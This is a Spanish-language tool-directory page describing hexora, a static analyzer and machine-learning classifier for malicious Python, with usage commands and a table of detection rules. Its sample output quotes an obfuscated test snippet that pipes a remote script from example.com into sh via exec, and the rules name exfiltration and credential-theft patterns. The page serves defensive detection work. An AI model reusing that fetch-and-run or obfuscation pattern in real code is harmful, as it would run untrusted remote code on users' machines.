Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
hexora — Análisis estático de código Python malicioso | Kitploit
Herramientas/GitHubGitHub/rushter/hexora
Gestión de Indicadores de Compromiso (IOC)Análisis EstáticoAnálisis de VulnerabilidadesAnálisis de CódigoAnálisis de MalwareSeguridad de Cadena de SuministroAprendizaje Automático
GitHubrushter/hexora

hexora

Análisis estático de código Python malicioso

Ver Repositorio
16885hace 3 díasRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

hexora

PyPI - Version

Hexora es una herramienta de análisis estático diseñada para detectar patrones maliciosos y dañinos en código Python. Combina un motor de análisis estático basado en reglas con un modelo de aprendizaje automático que puntúa archivos fuente completos para clasificarlos como maliciosos o benignos.

Se puede usar para:

  • Auditar dependencias de proyectos para detectar posibles ataques a la cadena de suministro
  • Detectar scripts maliciosos encontrados en plataformas como Pastebin, GitHub o directorios abiertos
  • Analizar archivos IoC de incidentes de seguridad pasados
  • Auditar nuevos paquetes subidos a PyPi.
Ejemplo de Hexora

Ejemplos

Para ejemplos de salida, consulte el archivo docs/examples.md.

Instalación

Usando Python

Requiere Python 3.9+.

root@kitploit:~
pip install hexora

Usando uv:

root@kitploit:~
uv tool install hexora

Uso

root@kitploit:~
hexora --help

Auditar un solo archivo

root@kitploit:~
>  hexora audit test.py

warning[HX2000]: Reading from the clipboard can be used to exfiltrate sensitive data.
  ┌─ resources/test/test.py:3:8
  │
1 │ import pyperclip
2 │
3 │ data = pyperclip.paste()
  │        ^^^^^^^^^^^^^^^^^ HX2000
  │
  = Confidence: High
    Help: Clipboard access can be used to exfiltrate sensitive data such as passwords and keys.
    Machine learning based score for file: 0.93

warning[HX3000]: Possible execution of unwanted code
   ┌─ resources/test/test.py:20:1
   │
19 │ (_ceil, _random, Math,), Run, (Floor, _frame, _divide) = (exec, str, tuple), map, (ord, globals, eval)
20 │ _ceil("import subprocess;subprocess.call(['curl -fsSL https://example.com/b.sh | sh'])")
   │ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX3000
   │

Auditar un directorio

root@kitploit:~
hexora audit --output-format terminal resources/test/

Auditar paquetes del entorno virtual

root@kitploit:~
hexora audit --exclude HX5020,HX5030,HX5040,HX5050,HX5060 --min-confidence high .venv/lib/python3.11/site-packages/

Donde python3.11 es la versión de Python en el entorno virtual.

Consejos:

  • Use --exclude para suprimir ciertos códigos de regla (por ejemplo, importaciones ruidosas) en una ejecución determinada.
  • Use --min-confidence para centrarse solo en hallazgos de alta confianza.

La confianza indica qué tan malicioso es un determinado fragmento de código. Algunas bibliotecas o fragmentos de código se utilizan con fines legítimos y es difícil distinguir los casos de uso legítimos de los maliciosos. Por eso algunos aciertos tienen un nivel de confianza bajo.

Algunas reglas pueden tener diferentes niveles de confianza. Evite filtrar muchas reglas por código a menos que esté muy seguro. Por ejemplo, la ejecución de código y de shell pueden tener confianza media, alta y muy alta. Esto depende de cómo se ejecutó el código. Si detectamos un intento de ofuscación, elevamos la confianza.

Por ejemplo, este código tendrá una confianza alta:

root@kitploit:~
globals()["__builtins__"].eval("print(123)")

Uso en Python

root@kitploit:~
>>> import hexora
>>> results = hexora.audit_path("/Projects/hexora/resources/test/")
>>> len(results)
15
>>> results[0]
{'items': [{'confidence': 'low',
            'description': 'pyperclip can be used to copy and paste data from '
                           'the clipboard.',
            'label': 'pyperclip',
            'location': (7, 16),
            'rule': 'HX5010'},
           {'confidence': 'high',
            'description': 'Reading from the clipboard can be used to '
                           'exfiltrate sensitive data.',
            'label': 'pyperclip.paste',
            'location': (25, 42),
            'rule': 'HX2000'}],
 'path': '/Projects/hexora/resources/test/clipboard_01.py'}
>>> # Single file audit
>>> result = hexora.audit_file("/Projects/hexora/resources/test/clipboard_01.py")
>>> ...

Pruebas con conjuntos de datos maliciosos

Al desarrollar nuevas reglas, puede usar conjuntos de datos maliciosos existentes como malicious-software-packages-dataset.

Después de clonar, apunte la herramienta de evaluación comparativa al directorio del conjunto de datos:

root@kitploit:~
cargo run --release benchmark malicious-software-packages-dataset/samples/pypi/ --print-missing --exclude-path data/excluded.txt  --min-confidence high

Reglas disponibles

Se agregan nuevas reglas regularmente.

Actualmente, están disponibles las siguientes reglas:

Créditos

Para el análisis, usamos el analizador AST de la biblioteca ruff.

Descargar herramienta
CódigoNombreDescripción
HX1000AppEnumerationEnumeración sospechosa de aplicaciones.
HX1010BrowserEnumerationEnumeración sospechosa del navegador (apps, cookies, historial, etc.).
HX1020PathEnumerationEnumeración sospechosa de rutas.
HX1030OSFingerprintHuella digital sospechosa del sistema operativo.
HX2000ClipboardReadLectura del portapapeles.
HX2010EnvAccessAcceso a una variable de entorno sensible.
HX2020ScreenshotCaptureCaptura de pantallas de la pantalla.
HX3000CodeExecPosible ejecución de código.
HX3010ShellExecEjecución de un comando de shell.
HX3040DLLInjectionPosible inyección de DLL.
HX3050DangerousExecEjecución de un comando potencialmente peligroso dentro de un comando de shell.
HX3060SuspiciousCallLlamada a función sospechosa.
HX4000ObfuscatedShellExecEjecución de un comando de shell posiblemente ofuscado.
HX4010ObfuscatedCodeExecEjecución de código posiblemente ofuscado.
HX5000DunderImportUso sospechoso de __import__.
HX5010SuspiciousImportImportación sospechosa.
HX5020CtypesImportImportación sospechosa de ctypes.
HX5030PickleImportImportación sospechosa de pickle.
HX5040StructImportImportación sospechosa de struct.
HX5050SocketImportImportación sospechosa de socket.
HX5060MarshalImportImportación sospechosa de marshal.
HX6000Base64StringCadena larga codificada en Base64 detectada; posible ofuscación de código.
HX6010HexedLiteralsLista de literales codificados en hexadecimal detectada; posible payload.
HX6020HexedStringCadena larga codificada en hexadecimal detectada; posible payload.
HX6030IntLiteralsLista grande de literales enteros detectada; posible ofuscación de código.
HX6040CVEInLiteralEl literal contiene un identificador CVE.
HX6050SuspiciousLiteralLiteral sospechoso detectado; posible enumeración de datos.
HX6060PathTraversalPath traversal sospechoso.
HX6070BrowserExtensionEnumeración de extensiones de navegador sensibles.
HX6080WebHookWebhook sospechoso detectado. Posible exfiltración de datos.
HX6090TelegramTokenToken de bot de Telegram detectado en un literal de cadena.
HX7000SuspiciousFunctionNameNombre de función sospechoso.
HX7010SuspiciousParameterNameNombre de parámetro sospechoso.
HX7020SuspiciousVariableNombre de variable sospechoso.
HX9000DataExfiltrationPosible exfiltración de datos.
HX8000BinaryDownloadDescarga sospechosa de binarios.
HX8010BuiltinsVariableUso sospechoso de variables builtin.
HX8020SuspiciousCommentComentario sospechoso.
HX8030SuspiciousWriteEscritura sospechosa en el sistema de archivos.
HX8040InstallHookConfiguración sospechosa de hook de instalación.